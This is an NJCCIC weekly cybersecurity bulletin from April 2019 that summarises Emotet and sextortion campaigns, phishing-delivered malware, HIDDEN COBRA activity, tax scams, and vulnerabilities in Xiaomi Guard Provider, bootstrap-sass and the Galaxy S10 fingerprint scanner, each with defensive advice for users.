NJCCIC Weekly Bulletin | April 11, 2019

To view this email as a web page, go here.
April 11, 2019

Garden State Cyber Threat Highlights

Providing our members with a weekly insight into the threats and malicious activity directly targeting New Jersey networks.

Emotet Activity Continues

The NJCCIC has received reports regarding spam emails containing either malicious links or attachments associated with the Emotet campaign. Trend Micro also recently observed emails containing password-protected attachments delivering the trojan, as the password was included in the body of the email. Threat actors continue to change tactics and techniques to bypass security solutions and avoid detection and sandbox environments. The NJCCIC recommends users refrain from clicking on embedded links or attachments, or downloading files from unsolicited or unexpected emails, and verify emails from known senders via a separate means of communication. If an Emotet infection is strongly suspected but anti-virus/anti-malware solutions cannot detect or remove it, we advise users to reimage the affected system’s hard drive. Also, we encourage users to proactively monitor and change passwords to any accounts accessed on infected systems and enable multi-factor authentication where available. If a user believes their account has been compromised, we encourage them to send a copy of the suspicious email to spamreport@cyber.nj.gov and notify their agency ISO, Email Admin, and Helpdesk.

Threat Alerts 

Sextortion Scams Are Continuing to Evolve

Image Source: Bleeping Computer
Last month, a CIA extortion scam was reported to be widely distributed. The threat actor posed as a CIA technical collection officer and stated that they had webcam video evidence of the potential target visiting adult content sites and threatened to share the video with the target’s contacts if they do not pay an extortion fee.  A few weeks later, the threat actor changed tactics, informing the target that they are part of an underage pornography investigation, but the incriminating evidence would be destroyed for a fee. An additional variant emerged that included a password in the email for the attached PDF file containing an extortion payment bitcoin address and instructions. Another variant evolved into emails containing password-protected ZIP attachments that included both the PDF payment instructions as well as a link directing the target to the posted alleged evidence. As of April 7, 2019, Bleeping Computer reported yet another variant, which included a link to purchase the alleged password for the attached password-protected ZIP files containing alleged evidence showing the video recordings of the target. Extortion scams are constantly evolving to use different scare tactics and generate as much money as possible. The NJCCIC recommends users educate themselves and others on this and similar scams to prevent future victimization. There is no indication that any of these threats are credible. Anyone who receives one of these extortion emails should ignore and delete it. We encourage users to report cyber incidents via the NJCCIC Cyber Incident Report Form and the FBI’s Internet Crime Complaint Center (IC3) website.

Ten Malware Families Spread in Rare use of US Web Servers

Image Source: ZDNet
Bromium researchers have uncovered over a dozen servers, which are hosting ten different malware families spread via phishing campaigns and may be linked to the Necurs botnet. The servers are registered within the US, which is uncommon due to law enforcement’s extensive response to seize and remove malicious infrastructure. The main attack route appears to be phishing emails comprised of Microsoft Word files that hold malicious Visual Basic Application (VBA) macros. Campaigns tend to be US-centric, as emails are written in English and appear to be from US organizations such as the Centers for Disease Control and Prevention (CDC). According to Bromium, “Five families of banking Trojans -- Dridex, Gootkit, IcedID, Nymaim, and Trickbot -- two ransomware variants, Gandcrab and Hermes, as well as three information stealers, Fareit, Neutrino, and Azorult, were all found on the servers.” Threat actors were also observed hosting multiple malware families designed to work in tandem with each other. The most widespread bait was a job application and an unpaid invoice demand. For more information please read the ZDNet's article. The NJCCIC recommends users refrain from clicking on links contained in suspicious emails. If the user is uncertain of the email’s legitimacy, we advise them to contact the sender via an alternate method. The NJCCIC encourages users who believe they may have been compromised to send a copy of the suspicious email to spamreport@cyber.nj.gov and to notify their agency ISO, Email Admin, or Helpdesk.

North Korean Malicious Cyber Activity

The Department of Homeland Security (DHS) and the Federal Bureau of Investigation (FBI) have identified HOPLIGHT Trojan malware variants as part of malicious cyber activity known as HIDDEN COBRA. DHS and FBI have provided technical details on the tools and infrastructure used by threat actors of the North Korean government. The NJCCIC recommends users to review the Malware Analysis Report to enable network defense and reduce exposure to North Korean government malicious cyber activity.

Tax Season Scams Still Prevalent

Image Source: Proofpoint
The annual tax filing deadline is rapidly approaching and with that comes an increase of phishing and malware campaigns. 2019 brought NetWire campaigns that affected multiple countries, including the US. Threat actors use sophisticated social engineering tactics that invoke a sense of urgency and appear legitimate by using stolen IRS branding. Malware payloads have included, but are not limited to, Remote Access Tools (RATs), downloaders, and banking Trojans, while common phishing emails remain persistent. Targets have also expanded to include tax preparation offices and the IRS itself, claiming to be individuals in need of more assistance. Proofpoint researchers agree that, regardless of the payload, actors continue to successfully utilize social engineering techniques. The NJCCIC recommends users avoid clicking on links contained in suspicious emails. If the user is uncertain of the email’s legitimacy, we encourage them to contact the sender via an alternate method. We also advise users who believe their information may have been compromised to notify the IRS, banking institution, and a credit reporting bureau.

Vulnerability Advisories 

Xiaomi’s Pre-installed Security App Contains a ­­Severe Vulnerability

A severe vulnerability has been found in Xiaomi Guard Provider, a pre-installed security app on Xiaomi smartphones intended to protect the user from malware. Xiaomi is widely described as China’s Apple and is the world’s third-largest smartphone maker. Xiaomi is available to US citizens via third-party vendors and has steadily grown in popularity since 2017. Guard Provider uses several third-party Software Development Kits (SDKs), which unfortunately can allow the flaws to be exploited and permit threat actors to move laterally into other SDK’s. This vulnerability could allow the threat actor to carry out a Man-in-the-Middle (MiTM) attack and inject malicious code onto the device that contains ransomware or has password stealing or tracking capabilities. The vulnerability was discovered by Check Point Research and reported to Xiaomi, who released a patch shortly thereafter. There have been no reports of exploitation at the time of this writing. These types of apps are pre-installed on the mobile device out-of-the-box, and thus cannot be deleted. The NJCCIC recommends Xiaomi users to ensure that mobile device software is up-to-date and all security patches have been applied.

Vulnerability Found in Open-Source Website Development Tool

Image Source: Site24x7

An open source security firm, Snyk, recently alerted developers that a compromised version of the open-source website development tool bootstrap-sass was published to the RubyGems repository where programmers share application code. Threat actors most likely built the malicious copy by either compromising the system or phishing a developer's credentials. Enterprise and startup businesses use this popular tool, and now there is potential that many applications are vulnerable to remote code execution. Snyk further advised its users to update their systems away from the infected framework (version The NJCCIC recommends patching systems as soon as updates become available. For more information, please review CyberScoop's article.

Samsung Galaxy S10 Fingerprint Scanner Tricked with 3D Print  

Image Source: phonearena.com

The new Samsung Galaxy S10 biometrics feature can be deceived in as little as 15 minutes. A video uploaded on Imgur has revealed how the certified FIDO Alliance Ultrasonic Fingerprint Scanner can be bypassed by a $450 3D printer. The user, Darkshark9, demonstrated this by taking a picture of his fingerprint on a wine glass and printing the image in resin. Prints can also be lifted off a phone’s screen and then imposed onto a glass item, producing similar results. Biometrics have recently been proven hackable by others. One demonstration displayed how face recognition could be bypassed by a good photo of the owner. Another example was a voicemail recording used to bypass voice recognition. Once a threat actor has bypassed the security measures, they could potentially gain access to personal identifiable information (PII) and bank accounts that also implement biometric security features. The Galaxy S10 also has a built-in crypto wallet, which could likewise be compromised with biometric deception. The concern is the ease of which physical identifiers can be bypassed. “The hope is now that Samsung is made aware of this flaw and adds additional security measures such as two-factor authentication,” stated Darkshark9. At the time of this writing, Samsung is continuing to provide updates to make further improvements. The NJCCIC recommends users to enable or continue using multi-factor authentication (MFA) and install updates as they become available. For more information please see Coin Rivet’s article.

Threat Profiles
Android: No new or updated variants were added.
Botnet: No new or updated botnets were added.
Cryptocurrency-Mining: No new or updated variants were added.
Exploit Kit: No new or updated exploit kits were added. 
Industrial Control Systems: One updated variant: Trisis/Triton.
iOS: No new or updated variants were added.
macOS: No new or updated variants were added.
Point-of-Sale: No new or updated variants were added.
 Two updated variants: LockerGogaWannaCry.
Trojan: Two updated variants: EmotetTrickBot.

ICS-CERT Advisories
Adobe | Apache | Intel (1, 2, 3, 4)
Juniper | 
Microsoft | Nvidia | Samba (1, 2)
Throwback Thursday
Be Sure to Secure
Threat Analysis

Social Engineering Awareness
Hackers Broke Into University Networks in Just Two Hours
Comment: Threat actors can potentially advance further in spear-phishing attacks than just targeting staff directories and spoofing emails. They can gain domain-level administrator access to personal information about students and staff, financial information, databases, and networks containing research data. It is important to know where data is stored, restrict access, and ensure systems and software are patched and up-to-date. In addition to performing regular vulnerability scans and implementing incident response plans, security awareness training for end users is key to help identify phishing emails and report on suspicious incidents or suspected attacks.

Cyber at a Glance
Magecart is the Most Infamous Payment Skimmer. But It’s Hardly the Only One
Comment: A physical credit card skimmer is the equivalent to Point-of-Sale (PoS) malware, which skims customer payment information during e-commerce transactions.  Threat actors inject code into targeted websites and then capture important account details. They also create additional backdoors to regain access and restore the JavaScript-sniffers if removed. It is recommended to frequently check for any suspicious transactions on credit card statements. Users should report suspicious activity to their finanical institution immediately.
Students Hack High School WiFi to Get Out of Tests
Comment: As the demand for technology at academic institutions increases, so should the security. Two students at a New Jersey high school presumably used a program or app to perform a denial-of-service attack on school WiFi equipment to make it crash or become too congested to use. This attack resulted in connection failures, disrupted classes, and inaccessible classwork.


Email a Cyber Liaison Officer at njccic@cyber.nj.gov.
The Weekly Bulletin aggregates information about cyber threats, vulnerabilities, and other resources to promote shared awareness and the adoption of best practices. Designed for a general audience, the Bulletin aims to bridge the information sharing gaps between all levels of government, the private sector, and our citizens.



We respect your right to privacy - click here to view our policy.